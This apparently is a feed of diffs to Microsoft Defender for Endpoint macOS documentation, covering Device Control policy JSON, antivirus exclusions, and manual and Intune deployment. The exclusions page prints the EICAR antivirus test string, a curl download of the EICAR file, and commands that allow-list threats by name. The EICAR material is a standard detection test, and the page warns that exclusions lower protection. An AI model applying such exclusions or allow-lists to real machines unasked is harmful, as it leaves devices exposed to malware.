-## End-user experience
-
-Once Deny happens and the notification is enabled in the policy, the end user sees a dialog:
--
-## Status
-
-Use `mdatp health --details device_control` to inspect the Device Control status:
-
-```console
-active : ["v2"]
-v1_configured : false
-v1_enforcement_level : unavailable
-v2_configured : true
-v2_state : "enabled"
-v2_sensor_connection : "created_ok"
-v2_full_disk_access : "approved"
-```
--- `active` - feature version, you should see ["v2"]. (Device Control is enabled, but not configured.)
- - [] - Device Control isn't configured on this machine.
- - ["v1"] - You are on a preview version of Device Control. Migrate to version 2 using this guide. v1 is considered obsolete and not described in this documentation.
- - ["v1","v2"] - You have both v1 and v2 enabled. Offboard from v1.
-- `v1_configured` - v1 configuration is applied-- `v1_enforcement_level` - when v1 is enabled-- `v2_configured` - v2 configuration is applied-- `v2_state` - v2 status, `enabled` if fully working-- `v2_sensor_connection` - if `created_ok`, then Device Control established connection to the system extension-- `v2_full_disk_access` - if not `approved`, then Device Control can't prevent some or all operations-
-## Reporting
-
-You are able to see the policy event on Advanced hunting and Device Control report. For more information, see [Protect your organization's data with Device Control](device-control-report.md).
-
-## Scenarios
-
-Here are some common scenarios to help you familiarize with Microsoft Defender for Endpoint and Microsoft Defender for Endpoint Device Control.
-
-### Scenario 1: Deny any removable media but allow specific USBs
-
-In this scenario, you need to create two groups: one group for any removable media, and another group for approved USBs group. You also need to create an access policy rule.
-
-#### Step 1: Settings: enable Device Control and set Default Enforcement
-
-```json
- "settings": {
-
- "features": {
-
- "removableMedia": {
-
- "disable": false
-
- }
-
- },
-
- "global": {
-
- "defaultEnforcement": "allow"
-
- },
-
- "ux": {
-
- "navigationTarget": "http://www.deskhelp.com"
-
- }
-
- }
-```
-
-#### Step 2: Groups: Create any removable media group and approved-USBs group
---1. Create a group to cover any removable media devices--1. Create a group for approved USBs--1. Combine those groups into one 'groups'-
-```json
-"groups": [
-
- {
-
- "type": "device",
-
- "id": "3f082cd3-f701-4c21-9a6a-ed115c28e211",
-
- "name": "All Removable Media Devices",
-
- "query": {
-
- "$type": "all",
-
- "clauses": [
-
- {
-
- "$type": "primaryId",
-
- "value": "removable_media_devices"
-
- }
-
- ]
-
- }
-
- },
-
- {
-
- "type": "device",
-
- "id": "3f082cd3-f701-4c21-9a6a-ed115c28e212",
-
- "name": "Kingston Devices",
-
- "query": {
-
- "$type": "all",
-
- "clauses": [
-
- {
-
- "$type": "vendorId",
-
- "value": "0951"
-
- }
-
- ]
-
- }
-
- }
-
- ]
-```
-
-#### Step 3: Rules: Create Deny policy for unallowed USBs
-
-Create access policy rule and put into 'rules':
-
-```json
- "rules": [
-
- {
-
- "id": "772cef80-229f-48b4-bd17-a69130092981",
-
- "name": "Deny RWX to all Removable Media Devices except Kingston",
-
- "includeGroups": [
-
- "3f082cd3-f701-4c21-9a6a-ed115c28e211"
-
- ],
-
- "excludeGroups": [
-
- "3f082cd3-f701-4c21-9a6a-ed115c28e212"
-
- ],
-
- "entries": [
-
- {
-
- "$type": "removableMedia",
-
- "id": "A7CEE2F8-CE34-4B34-9CFE-4133F0361035",
-
- "enforcement": {
-
- "$type": "deny"
-
- },
-
- "access": [
-
- "read",
-
- "write",
-
- "execute"
-
- ]
-
- },
-
- {
-
- "$type": "removableMedia",
-
- "id": "18BA3DD5-4C9A-458B-A756-F1499FE94FB4",
-
- "enforcement": {
-
- "$type": "auditDeny",
-
- "options": [
-
- "send_event",
-
- "show_notification"
-
- ]
-
- },
-
- "access": [
-
- "read",
-
- "write",
-
- "execute"
-
- ]
-
- }
-
- ]
-
- }
-
- ]
-```
-
-In this case, only have one access rule policy, but if you have multiple, make sure to add all into 'rules'.
--
-## Known Issues
-
->[!WARNING]
->In macOS Sonoma 14.3.1, Apple made a change to the [handling of Bluetooth devices](https://developer.apple.com/forums/thread/738748) that impacts Defender for Endpoint device controls ability to intercept and block access to Bluetooth devices. At this time, the recommended mitigation is to use a version of macOS less than 14.3.1.
-
->[!WARNING]
->Device Control on macOS restricts Android devices that are connected using PTP mode **only**. Device control does not restrict other modes such as File Transfer, USB Tethering and MIDI
---
-## See also
--- [Deploy Device Control by using Intune](mac-device-control-intune.md)-- [Deploy Device Control by using JAMF](mac-device-control-jamf.md)-- [Deploy Device Control manually](mac-device-control-manual.md)-- [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security Mac Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-exclusions.md
- Title: Configure and validate exclusions for Microsoft Defender for Endpoint on Mac
-description: Provide and validate exclusions for Microsoft Defender for Endpoint on Mac. Exclusions can be set for files, folders, and processes.
------- m365-security-- tier3-- mde-macos-- Previously updated : 02/29/2024--
-# Configure and validate exclusions for Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-This article provides information on how to define exclusions that apply to on-demand scans, and real-time protection and monitoring.
-
-> [!IMPORTANT]
-> The exclusions described in this article don't apply to other Defender for Endpoint on Mac capabilities, including endpoint detection and response (EDR). Files that you exclude using the methods described in this article can still trigger EDR alerts and other detections.
-
-You can exclude certain files, folders, processes, and process-opened files from Defender for Endpoint on Mac scans.
-
-Exclusions can be useful to avoid incorrect detections on files or software that are unique or customized to your organization. They can also be useful for mitigating performance issues caused by Defender for Endpoint on Mac.
-
-To narrow down which process and/or path and/or extension you need to exclude, please use [real-time-protection-statistics](/microsoft-365/security/defender-endpoint/mac-support-perf).
-
-> [!WARNING]
-> Defining exclusions lowers the protection offered by Defender for Endpoint on Mac. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you are confident are not malicious.
-
-## Supported exclusion types
-
-The following table shows the exclusion types supported by Defender for Endpoint on Mac.
-
-Exclusion|Definition|Examples
-||
-File extension|All files with the extension, anywhere on the machine|`.test`
-File|A specific file identified by the full path|`/var/log/test.log` <p> `/var/log/*.log` <p> `/var/log/install.?.log`
-Folder|All files under the specified folder (recursively)|`/var/log/` <p> `/var/*/`
-Process|A specific process (specified either by the full path or file name) and all files opened by it|`/bin/cat` <p> `cat` <p> `c?t`
-
-File, folder, and process exclusions support the following wildcards:
-
-|Wildcard|Description|Examples|
-||||
-|\*|Matches any number of any characters including none (note if this wildcard is not used at the end of the path then it will substitute only one folder)| `/var/*/tmp` includes any file in `/var/abc/tmp` and its subdirectories, and `/var/def/tmp` and its subdirectories. It does not include `/var/abc/log` or `/var/def/log` <p> <p> `/var/*/` includes any file in `/var` and its subdirectories.|
-|?|Matches any single character|`file?.log` includes `file1.log` and `file2.log`, but not `file123.log`|
-
-> [!NOTE]
-> When using the * wildcard at the end of the path, it will match all files and subdirectories under the parent of the wildcard.
->
-> The product attempts to resolve firmlinks when evaluating exclusions. Firmlink resolution does not work when the exclusion contains wildcards or the target file (on the `Data` volume) does not exist.
-
-## Best practices for adding antimalware exclusions for Microsoft Defender for Endpoint on macOS.
-
-1. Write down why an exclusion was added to a central location where only SecOps and/or Security Administrator have access.
-
- e.g. Submitter, date, app name, reason, and exclusion information.
-
-1. Make sure to have an expiration date* for the exclusions
-
- *except for apps that the ISV stated that there is no additional tweaking that could be done to prevent the false positive or higher cpu utilization from occurring.
-
-1. Avoid migrating 3rd party antimalware exclusions since they may no longer be applicable nor applicable to Microsoft Defender for Endpoint on macOS.
-
-1. Order of exclusions to consider top (more secure) to bottom (least secure):
-
- 1. Indicators - Certificate - allow
-
- 1. Add an extended validation (EV) code signing.
-
- 1. Indicators - File hash - allow
-
- 1. If a process or daemon doesn't change often, e.g. the app doesn't have a monthly security update.
-
- 1. Path & Process
-
- 1. Process
-
- 1. Path
-
- 1. Extension
-
-## How to configure the list of exclusions
-
-### From the Microsoft Defender for Endpoint Security Settings management console
-
-1. Login to the [Microsoft Defender portal](https://security.microsoft.com).
-2. Go to **Configuration management > Endpoint Security Policies > Create new Policy**
- - Select Platform: macOS
- - Select Template: Microsoft Defender Antivirus exclusions
-3. Select **Create Policy**
-4. Enter a name and description and select **Next**
-5. Expand **Antivirus engine**
-6. Select **Add**
-7. Select **Path** or **File extension** or **File name**
-8. Select **Configure instance** and add the exclusions as needed
-9. Select **Next**
-10. Assign the exclusion to a group and Select **Next**
-11. Select **Save**
-
-### From the management console
-
-For more information on how to configure exclusions from JAMF, Intune, or another management console, see [Set preferences for Defender for Endpoint on Mac](mac-preferences.md).
-
-### From the user interface
-
-1. Open the Defender for Endpoint application and navigate to **Manage settings** \> **Add or Remove Exclusion...**, as shown in the following screenshot:
-
- :::image type="content" source="mediatp-37-exclusions.png":::
-
-2. Select the type of exclusion that you wish to add and follow the prompts.
-
-## Validate exclusions lists with the EICAR test file
-
-You can validate that your exclusion lists are working by using `curl` to download a test file.
-
-In the following Bash snippet, replace `test.txt` with a file that conforms to your exclusion rules. For example, if you have excluded the `.testing` extension, replace `test.txt` with `test.testing`. If you are testing a path, ensure that you run the command within that path.
-
-```bash
-curl -o test.txt https://secure.eicar.org/eicar.com.txt
-```
-
-If Defender for Endpoint on Mac reports malware, then the rule is not working. If there is no report of malware, and the downloaded file exists, then the exclusion is working. You can open the file to confirm that the contents are the same as what is described on the [EICAR test file website](https://www.eicar.org/download-anti-malware-testfile/).
-
-If you do not have Internet access, you can create your own EICAR test file. Write the EICAR string to a new text file with the following Bash command:
-
-```bash
-echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > test.txt
-```
-
-You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to exclude.
-
-## Allow threats
-
-In addition to excluding certain content from being scanned, you can also configure the product not to detect some classes of threats (identified by the threat name). You should exercise caution when using this functionality, as it can leave your device unprotected.
-
-To add a threat name to the allowed list, execute the following command:
-
-```bash
-mdatp threat allowed add --name [threat-name]
-```
-
-The threat name associated with a detection on your device can be obtained using the following command:
-
-```bash
-mdatp threat list
-```
-
-For example, to add `EICAR-Test-File (not a virus)` (the threat name associated with the EICAR detection) to the allowed list, execute the following command:
-
-```bash
-mdatp threat allowed add --name "EICAR-Test-File (not a virus)"
-```
-
security Mac Install Jamfpro Login https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-jamfpro-login.md
- Title: Sign in to Jamf Pro
-description: Sign in to Jamf Pro.
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Sign in to Jamf Pro
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-1. Enter your credentials.
-
- :::image type="content" source="media/jamf-pro-portal1.png" alt-text="The Jamf Pro dashboard1" lightbox="media/jamf-pro-portal1.png":::
-
-2. Select **Computers**.
-
- :::image type="content" source="media/jamf-pro-dashboard.png" alt-text="The Jamf Pro dashboard2" lightbox="media/jamf-pro-dashboard.png":::
-
-3. You see the settings that are available.
-
- :::image type="content" source="media/jamfpro-settings.png" alt-text="The Jamf Pro dashboard3" lightbox="media/jamfpro-settings.png":::
--
-## Next step
-
-[Setup the device groups in Jamf Pro](mac-jamfpro-device-groups.md)
-
security Mac Install Manually https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-manually.md
- Title: Manual deployment for Microsoft Defender for Endpoint on macOS
-description: Install Microsoft Defender for Endpoint on macOS manually, from the command line.
------- m365-security-- tier3-- mde-macos--- Previously updated : 12/15/2023--
-# Manual deployment for Microsoft Defender for Endpoint on macOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink).
-
-This article describes how to deploy Microsoft Defender for Endpoint on macOS manually. A successful deployment requires the completion of all of the following steps:
--- [Download installation and onboarding packages](#download-installation-and-onboarding-packages)-- [Application installation (macOS 11 and newer versions)](#application-installation-macos-11-and-newer-versions)-- [Onboarding Package](#onboarding-package)-- [Grant Full Disk Access](#allow-full-disk-access)-- [Ensure Background Execution](#background-execution)-
-## Prerequisites and system requirements
-
-Before you get started, see [the main Microsoft Defender for Endpoint on macOS page](microsoft-defender-endpoint-mac.md) for a description of prerequisites and system requirements for the current software version.
-
-## Download installation and onboarding packages
-
-Download the installation and onboarding packages from Microsoft Defender portal.
--
-1. In <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, go to **Settings > Endpoints > Device management > Onboarding**.
-2. In Section 1 of the page, set operating system to **macOS** and Deployment method to **Local script**.
-3. In Section 2 of the page, select **Download installation package**. Save it as wdav.pkg to a local directory.
-4. In Section 2 of the page, select **Download onboarding package**. Save it as WindowsDefenderATPOnboardingPackage.zip to the same directory.
- :::image type="content" source="media/onboarding-package-step4.png" alt-text="Screenshot that shows the options to download the installation and onboarding packages.":::
-
-5. From a command prompt, verify that you have the two files.
- - Type *cd Downloads* and press **Enter**.
- - Type *ls* and press **Enter**.
- :::image type="content" source="media/Terminal-image-step5.png" alt-text="Screenshot that displays the two download files.":::
-6. Copy the *wdav.pkg* and *MicrosoftDefenderATPOnboardingMacOs.sh* to the device where you want to deploy the Microsoft Defender for Endpoint on macOS.
-
-## Application installation (macOS 11 and newer versions)
-
-To complete this process, you must have admin privileges on the device.
-
-1. Do one of the following steps:
-
- - Navigate to the downloaded *wdav.pkg* in **Finder** and open it.
-
- Or
-
- - You can download the *wdav.pkg*- from **Terminal**
-
- ```console
- sudo installer -store -pkg /Users/admin/Downloads/wdav.pkg -target /
- ```
-
- :::image type="content" source="media/monterey-install-1.png" alt-text="Screenshot that shows the installation process for the application":::
-
-2. Select **Continue**.
-
-3. Read through the **Software License Agreement** and select **Continue** to agree with the terms.
-
- :::image type="content" source="media/software-license-agreement.png" alt-text="Screenshot that shows the Software License Agreement.":::
-
-4. Read through the *End-User License Agreement (EULA)* and select **Agree**.
-
- :::image type="content" source="media/agree-license.png" alt-text="Screenshot that shows the acceptance of the agreement.":::
-
-5. From **Destination Select**, select the disk where you want to install the Microsoft Defender Software, for example, *Macintosh HD* and select **Continue**.
-
- :::image type="content" source="media/destination-select.png" alt-text="Screenshot that shows the selection of destination for installation.":::
-
- > [!NOTE]
- > The amount of disk space required for installation is around 777 MB.
-
-6. To change the installation destination, select **Change Install Location...**.
-
- :::image type="content" source="media/installation-type.png" alt-text="Screenshot that shows the final installation step.":::
-
-7. Click **Install**.
-
-8. Enter the password, when prompted.
-
- :::image type="content" source="media/password-2g.png" alt-text="Screenshot that shows the password dialog box.":::
-
-9. Click **Install Software**.
-
-10. At the end of the installation process, for macOS Big Sur (11.0) or latest version, you're prompted to approve the system extensions used by the product. Select **Open Security Preferences**.
-
- :::image type="content" source="media/monterey-install-2.png" alt-text="Screenshot that shows the system extension approval":::
-
-11. To enable system extension, select **Details**.
-
- :::image type="content" source="media/system-extention-image.png" alt-text="Screenshot that shows the system extension.":::
-
-12. From the **Security & Privacy** window, select the checkboxes next to **Microsoft Defender** and select **OK**.
-
- :::image type="content" source="media/security-privacy-window-updated.png" alt-text="Screenshot that shows the security and privacy window.":::
-
-13. Repeat steps 11 and 12 for all system extensions distributed with Microsoft Defender for Endpoint on Mac.
-
-14. As part of the Endpoint Detection and Response capabilities, Microsoft Defender for Endpoint on Mac inspects socket traffic and reports this information to the Microsoft Defender portal. When prompted to grant Microsoft Defender for Endpoint permissions to filter network traffic, select **Allow**.
-
- :::image type="content" source="media/monterey-install-4.png" alt-text="Screenshot that shows the system extension security preferences2":::
-
- To troubleshoot System Extension issues, refer [Troubleshoot System Extension](mac-support-sys-ext.md).
-
-## Allow Full Disk Access
-
-The macOS Catalina (10.15) and newer versions require full disk access to be granted to **Microsoft Defender for Endpoint** in order to be able to protect and monitor.
-
-> [!NOTE]
-> Full disk access grant to **Microsoft Defender for Endpoint** is a new requirement for all the third-party software by Apple for files and folders containing personal data.
-
-To grant full disk access:
-
-1. Open **System Preferences** \> **Security & Privacy** \> **Privacy** \> **Full Disk Access**. Click the lock icon to make changes (bottom of the dialog box).
-
-1. Grant **Full Disk Access** permission to **Microsoft Defender** and **Microsoft Defenders Endpoint Security Extension**.
-
- :::image type="content" source="media/full-disk-access-security-privacy.png" alt-text="The screenshot shows the full disk access's security and privacy.":::
-
-1. Select **General** \> **Restart** for the new system extensions to take effect.
-
- :::image type="content" source="media/restart-fulldisk.png" alt-text="Screenshot that allows you to restart the system for new system extensions to be enabled.":::
-
-1. Enable *Potentially Unwanted Application* (PUA) in block mode.
-
- To enable PUA, refer [configure PUA protection](mac-pua.md).
-
-1. Enable *Network Protection*.
-
- To enable *Network protection*, refer [manual deployment](network-protection-macos.md).
-
-1. Enable *Device Control*.
-
- To enable *Device Control*, refer [device control for macOS](mac-device-control-overview.md).
-
-1. Enable *Tamper Protection* in block mode.
-
- To enable *Tamper Protection*, refer [Protect MacOS security settings with tamper protection](tamperprotection-macos.md).
-
-1. If you have the *Microsoft Purview ΓÇô Endpoint data loss prevention license*, you can review [Get started with Microsoft Purview - Endpoint data loss prevention](/purview/endpoint-dlp-getting-started).
-
-## Background execution
-
-Starting with macOS 13, a user must explicitly allow an application to run in background.
-macOS will pop a prompt up, telling the user that Microsoft Defender can run in background.
--
-You can view applications permitted to run in background in System Settings => Login Items => Allow in the Background at any time:
--
-Make sure all Microsoft Defender and Microsoft Corporation items are enabled. If they are disabled then macOS will not start Microsoft Defender after a machine restart.
-
-## Bluetooth permissions
-
-Starting with macOS 14, a user must explicitly allow an application to access Bluetooth.
-macOS will pop a prompt up, telling the user that Microsoft Defender can access Bluetooth (applies only if you use Bluetooth based policies for Device Control).
-Click Allow to grant Microsoft Defender to access Bluetooth.
--
-You can confirm that permissions are granted in System Settings => Privacy Settings => Bluetooth.
--
-## Onboarding Package
-
-Once you have installed the MDE on macOS client, you must now onboard the package, which registers to your Microsoft Defender for Endpoint tenant and licenses it.
-
-1. Verify if MDE on macOS has already been onboarded.
-
- Copy *wdav.pkg* and *MicrosoftDefenderATPOnboardingMacOs.sh* to the device where you have deployed Microsoft Defender for Endpoint on macOS.
-
- The client device isn't associated with *org_id*. The *org_id* attribute is blank.
-
- ```bash
- mdatp health --field org_id
- ```
-
-2. Run the Bash script to install the onboarding package:
-
- ```bash
- sudo bash -x MicrosoftDefenderATPOnboardingMacOs.sh
- ```
-
-3. Verify that the device is now associated with your organization and reports a valid org ID:
-
- ```bash
- mdatp health --field org_id
- ```
-
- After installation, you'll see the Microsoft Defender icon in the macOS status bar in the top-right corner.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/mdatp-icon-bar.png" alt-text="Screenshot that shows the Microsoft Defender icon in status bar":::
-
- You can [troubleshoot license issues for Microsoft Defender for Endpoint on macOS](mac-support-license.md).
-
-4. Run the connectivity test.
-
- ```bash
- mdatp connectivity test
- ```
-
-You can [troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on macOS](troubleshoot-cloud-connect-mdemac.md).
-
-## Verifying anti-malware detection
-
-See the following article to test for anti-malware detection review: [Antivirus detection test to verify device onboarding and reporting services](validate-antimalware.md)
-
-## Verifying EDR detection
-
-See the following article to test for an EDR detection review: [EDR detection test to verify device onboarding and reporting services](edr-detection.md).
-
-## Logging installation issues
-
-For more information on how to find the automatically generated log that's created by the installer, see [Logging installation issues](mac-resources.md#logging-installation-issues).
-
-For information on troubleshooting procedures, see:
--- [Troubleshoot system extension issues in Microsoft Defender for Endpoint on macOS](mac-support-sys-ext.md)-- [Troubleshoot installation issues for Microsoft Defender for Endpoint on macOS](mac-support-install.md)-- [Troubleshoot license issues for Microsoft Defender for Endpoint on macOS](mac-support-license.md)-- [Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on macOS](troubleshoot-cloud-connect-mdemac.md)-- [Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS](mac-support-perf.md)-
-## Uninstallation
-
-See [Uninstalling](mac-resources.md#uninstalling) for details on how to remove Microsoft Defender for Endpoint on macOS from client devices.
-
-> [!TIP]
->
-> - Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: [Microsoft Defender for Endpoint Tech Community](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/bd-p/MicrosoftDefenderATP).
-> - If you have any feedback that you will like to share, submit it by opening Microsoft Defender Endpoint on Mac on your device and navigate to **Help** \> **Send feedback**.
-
-## Recommended content
--- [Learn how to install, configure, update, and use Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md).-- [Learn how to set up the Microsoft Defender for Endpoint on macOS policies in Jamf](mac-jamfpro-policies.md).-- [Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro](mac-install-with-jamf.md).-- [Learn how to troubleshoot license issues in Microsoft Defender for Endpoint on Mac](mac-support-license.md).-- [Learn how to use resources for Microsoft Defender for Endpoint on Mac, including how to uninstall it, how to collect diagnostic logs, CLI commands, and known issues with the product](mac-resources.md).-- [Learn how to configure Microsoft Defender for Endpoint on Mac in enterprise organizations](mac-preferences.md).-- [Learn how to install Microsoft Defender for Endpoint on Mac on other management solutions](mac-install-with-other-mdm.md).-- [Learn how to detect and block Potentially Unwanted Applications (PUA) using Microsoft Defender for Endpoint on macOS](mac-pua.md).
security Mac Install With Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-intune.md
- Title: Intune-based deployment for Microsoft Defender for Endpoint on Mac
-description: Install Microsoft Defender for Endpoint on Mac, using Microsoft Intune.
------- m365-security-- tier3-- mde-macos-- Previously updated : 03/28/2024--
-# Deploy Microsoft Defender for Endpoint on macOS with Microsoft Intune
--
-**Applies to:**
--- [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-
-This article describes how to deploy Microsoft Defender for Endpoint on macOS through Microsoft Intune.
-
-## Prerequisites and system requirements
-
-Before you get started, see [the main Microsoft Defender for Endpoint on macOS page](microsoft-defender-endpoint-mac.md) for a description of prerequisites and system requirements for the current software version.
-
-## Overview
-
-The following table summarizes the steps you would need to take to deploy and manage Microsoft Defender for Endpoint on Macs, via Microsoft Intune. See the following table for more detailed steps.
-
-|Step |Sample file name |Bundle identifier |
-||||
-|Approve system extension|`sysext.mobileconfig`|N/A|
-|Network extension policy|`netfilter.mobileconfig`|N/A|
-|Full Disk Access|`fulldisk.mobileconfig`|`com.microsoft.wdav.epsext`|
-|Microsoft Defender for Endpoint configuration settings <br/><br/>If you're planning to run non-Microsoft antivirus on Mac, set `passiveMode` to `true`.|`MDE_MDAV_and_exclusion_settings_Preferences.xml`|`com.microsoft.wdav`|
-|Background services|`background_services.mobileconfig`|N/A|
-|Configure Microsoft Defender for Endpoint notifications|`notif.mobileconfig`|`com.microsoft.wdav.tray`|
-|Accessibility settings|`accessibility.mobileconfig`|`com.microsoft.dlp.daemon`|
-|Bluetooth|`bluetooth.mobileconfig`|`com.microsoft.dlp.agent`|
-|Configure Microsoft AutoUpdate (MAU)|`com.microsoft.autoupdate2.mobileconfig`|`com.microsoft.autoupdate2`|
-|Device Control|`DeviceControl.mobileconfig`|N/A|
-|Data Loss Prevention|`DataLossPrevention.mobileconfig`|N/A|
-|Download the onboarding package|`WindowsDefenderATPOnboarding__MDATP_wdav.atp.xml`|`com.microsoft.wdav.atp`|
-|Deploy the Microsoft Defender for Endpoint on macOS application|`Wdav.pkg`|N/A|
-
-## Create system configuration profiles
-
-The next step is to create system configuration profiles that Microsoft Defender for Endpoint needs.
-In the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), open **Devices** \> **Configuration profiles**.
-
-### Step 1: Approve system extensions
-
-1. In Microsoft Defender portal, go to **Settings** \> **Endpoints** \> **Device management** \> **Onboarding**.
-
- This profile is needed for Big Sur (11) or later. It is ignored on older macOS since they use the kernel extension.
-
-1. Under **Configuration profiles**, select **Create Profile**.
-
-1. Under **Platform**, select **macOS**.
-
-1. Under **Profile type**, select **Templates**.
-
-1. Under **Template name**, select **Extensions**.
-
-1. Select **Create**.
-
-1. On the **Basics** tab, **Name** the profile. For example, `SysExt-prod-macOS-Default-MDE`.
-
-1. Select **Next**.
-
-1. On the **Configuration settings** tab, expand **System Extensions** and add the following entries in the **Allowed system extensions** section:
-
- |Bundle identifier|Team identifier|
- |||
- |`com.microsoft.wdav.epsext`|`UBF8T346G9`|
- |`com.microsoft.wdav.netext`|`UBF8T346G9`|
-
- :::image type="content" source="media/mac-system-extension-intune2.png" alt-text="The settings of the system's extension" lightbox="media/mac-system-extension-intune2.png":::
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
-1. Review the configuration profile. Select **Create**.
-
-### Step 2: Network filter
-
-As part of the Endpoint Detection and Response capabilities, Microsoft Defender for Endpoint on macOS inspects socket traffic and reports this information to the Microsoft 365 Defender portal. The following policy allows the network extension to perform this functionality.
-
-Download [netfilter.mobileconfig](https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mobileconfig/profiles/netfilter.mobileconfig) from [GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles).
-
-To configure network filter:
-
-1. Under **Configuration profiles**, select **Create Profile**.
-
-1. Under **Platform**, select **macOS**.
-
-1. Under **Profile type**, select **Templates**.
-
-1. Under **Template name**, select **Custom**.
-
-1. Select **Create**.
-
-1. On the **Basics** tab, **Name** the profile. For example, `NetFilter-prod-macOS-Default-MDE`.
-
-1. Select **Next**.
-
-1. On the **Configuration settings** tab, enter a Cus**tom configuration profile** name. For example, `NetFilter-prod-macOS-Default-MDE`.
-
-1. Choose a Deployment channel.
-
-1. Select **Next**.
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
-1. Review the configuration profile. Select **Create**.
-
-### Step 3: Full Disk Access
-
-> [!NOTE]
-> Starting with macOS Catalina (10.15) or newer, in order to provide privacy for the end-users, it created the **FDA** (Full Disk Access). Enabling **TCC** (Transparency, Consent & Control) through a Mobile Device Management solution such as [Intune](mac-install-with-intune.md), will eliminate the risk of Defender for Endpoint losing **Full Disk Access** Authorization to function properly.
->
-> This configuration profile grants Full Disk Access to Microsoft Defender for Endpoint. If you previously configured Microsoft Defender for Endpoint through Intune, we recommend you update the deployment with this configuration profile.
-
-Download [**fulldisk.mobileconfig**](https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mobileconfig/profiles/fulldisk.mobileconfig) from [GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles).
-
-To configure Full Disk Access:
-1. Under **Configuration profiles**, select **Create Profile**.
-
-1. Under **Platform**, select **macOS**.
-
-1. Under **Profile type**, select **Templates**.
-
-1. Under **Template name**, select **Custom**.
-
-1. Select **Create**.
-
-1. On the **Basics** tab, **Name** the profile. For example, `FullDiskAccess-prod-macOS-Default-MDE`.
-
-1. Select **Next**.
-
-1. On the **Configuration settings** tab, enter a **Custom configuration profile** name. For example, `Fulldisk.mobileconfig`.
-
-1. Choose a **Deployment channel**.
-
-1. Select **Next**.
-
-1. Select a **Configuration profile file**.
-
-1. On the **Assignments** tab, assign the profile to a group where the macOS devices and/or users are located, or All Users and All devices.
-
-1. Review the configuration profile. Select **Create**.
-
-> [!NOTE]
-> Full Disk Access granted through Apple MDM Configuration Profile is not reflected in System Settings => Privacy & Security => Full Disk Access.
-
-### Step 4: Background services
-
- > [!CAUTION]
- > macOS 13 (Ventura) contains new privacy enhancements. Beginning with this version, by default, applications cannot run in background without explicit consent. Microsoft Defender for Endpoint must run its daemon process in background.
- >
- > This configuration profile grants Background Service permissions to Microsoft Defender for Endpoint. If you previously configured Microsoft Defender for Endpoint through Microsoft Intune, we recommend you update the deployment with this configuration profile.
-
-Download [background_services.mobileconfig](https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mobileconfig/profiles/background_services.mobileconfig) from [GitHub repository](https://github.com/microsoft/mdatp-xplat/tree/master/macos/mobileconfig/profiles).
-
-To configure background
-
-1. Under **Configuration profiles**, select **Create Profile**.
-
-1. Under **Platform**, select **macOS**.
-
-1. Under **Profile type**, select **Templates**.
-
-1. Under **Template name**, select **Custom**.
-
